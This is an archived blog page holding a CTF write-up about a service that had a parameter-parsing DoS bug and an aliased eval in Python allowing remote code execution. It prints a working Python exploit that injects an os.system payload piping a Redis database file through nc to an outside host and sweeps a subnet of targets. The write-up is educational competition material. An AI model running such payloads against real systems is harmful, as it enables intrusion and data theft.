πΎ Archived View for airmack.de βΊ single βΊ 583237b4a98a84f255a34164e3b60315039e21eb363b1be3104ef238a9β¦ captured on 2021-12-04 at 18:04:22. Gemini links have been rewritten to link to archived content
β¬ οΈ Previous capture (2021-11-30)
β‘οΈ Next capture (2021-12-17)
-=-=-=-=-=-=-
βββββββββββββββββββββββββββββββββββββββ βββββββββββββββββββββββββββββββββββββββ βββββββββββββββββββββββββββββββββββββββ
Aus der Kategorie Hacking
The server application was devided into two parts, a c-file (network.c) and a few python function encapseled in server. The first obvious error in the c-code was that the parameterparsing was broken and the service could be brought down (DOS) simply by sending a one byte message containing '
'. In the first half of the CTF this was used to defect other teams services, meaning that no other team could score flags or submit flags. This was later on changed, after we had a working exploit. The python function pp was using an aliased eval, which could be triggered by sending more than 34 characters. This lead to arbitrary code executation and a fully compromised machine, e.g. through a backconnect shell. The function pp was called when walking the 'add' path in the c-file. For gathering flags, one could just use 'strings /opt/db.rdb' and pipe it over a nc connection to a flag submit service, as the flags are stored in the redis database. An exploit could look like this:
#!/usr/bin/env python2 import socket import sys def read_until(s, token): data = "" while True: tmp = s.recv(4096) print tmp if not tmp: s.close() return data += tmp if token in data: return def backdoorinject(target): s = socket.socket() s.connect((target, 27)) read_until(s, "maths!") shellcmd = r"strings\x20/opt/db.rdb\x20|\x20nc\x20$IP$\x20$PORT$" payload = ( "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa__import__('os').system('%s')" % shellcmd ) s.sendall("add user " + payload + "\n") print s.recv(4096) s.close() targets = range(1, 254) socket.setdefaulttimeout(1) for i in targets: if i == 41: ##own ip continue try: hostname = "10.60." + str(i) + ".7" # The remote host print hostname, backdoorinject(hostname) print " send" except: print "...failed" pass
Project gemini erstellt am 13. Februar 2021
Eat Sleep PWN Repeat erstellt am 07. Dezember 2020
Breaking out of cisco anyconnect no local network restriction erstellt am 8. April 2018
Insomni Hack 2015(Lost In Memories) writeup erstellt am 23. Maerz 2014
ruCTF 2014(Pidometer) writeup erstellt am 21. Dezember 2014
CMake Matlab/Simulink crosscompiling erstellt am 02. September 2014